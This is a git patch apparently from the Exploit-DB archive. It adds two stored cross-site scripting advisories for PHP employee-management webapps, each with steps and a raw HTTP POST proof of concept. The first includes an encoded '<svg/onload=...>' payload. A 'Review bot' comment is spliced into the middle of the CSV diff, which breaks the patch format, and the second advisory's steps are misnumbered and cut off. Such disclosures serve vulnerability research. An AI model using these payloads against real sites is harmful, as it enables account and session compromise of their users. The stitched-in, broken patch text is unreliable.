From c26eab756eaac17aef6a77298a52502d016903bb Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 11 Nov 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-11-11
2 changes to exploits/shellcodes
Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
---
 exploits/php/webapps/50506.txt | 36 ++++++++++++++++++++++++
 exploits/php/webapps/50507.txt | 50 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 88 insertions(+)
 create mode 100644 exploits/php/webapps/50506.txt
 create mode 100644 exploits/php/webapps/50507.txt
diff --git a/exploits/php/webapps/50506.txt b/exploits/php/webapps/50506.txt
new file mode 100644
index 000000000..bac786b81
--- /dev/null
+++ b/exploits/php/webapps/50506.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
+# Date: 09/11/2021
+# Exploit Author: Ragavender A G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
+
+# Version: v1.0
+
+# Tested on: Windows 10
+
+*Exploit:*
+
+1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance
+2. Add New department with the following value:
+
+ - Name: **
+
+3. Save the Department and refresh the page, which should trigger the payload.
+
+*PoC:*
+
+POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/edtms/edtms/admin/?page=maintenance
+Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3
+
+id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1
\ No newline at end of file
diff --git a/exploits/php/webapps/50507.txt b/exploits/php/webapps/50507.txt
new file mode 100644
index 000000000..a6e91e478
--- /dev/null
+++ b/exploits/php/webapps/50507.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
+# Date: 10.11.2021
+# Exploit Author: İlhami Selamet
+# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
+# Version: v1.0
+# Tested on: Kali Linux + XAMPP v8.0.12
+
+Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
+
+Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
+Step 1 - Click on the 'Create New' button for adding a new department.
+Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field -
+Step 3 - Save the department.
+
+The stored XSS triggers for all users that navigate to the 'Department List' page.
+
+PoC
+
+POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
+Content-Length: 555
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
+Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54
+
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="description"
+
+desc
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------407760789114464123714007564888--
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 97d44682e..54c19dd63 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
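Review bot: The walkthrough in 50507.txt numbers two consecutive steps as "Step 1", and the "Step 2" sentence ends in a dangling "-" with nothing after it, so the written procedure does not line up with the request that follows; renumbering to `Step 1`–`Step 4` and completing or removing the trailing "-" would make the advisory readable. The advisory also states the impact ("triggers for all users that navigate to the 'Department List' page") but gives no root cause or remediation, which is what a defender triaging the entry needs most. A closing line such as `# Fix: HTML-encode the department name (and description) on output when rendering the Department List, and validate input server-side in save_department` would address that, hedged as presumed since the handler's source is not part of this commit.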
@@ -44604,3 +44604,5 @@ id,file,description,date,author,type,platform,port
 50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php,
 50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php,
 50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
+50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
+50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,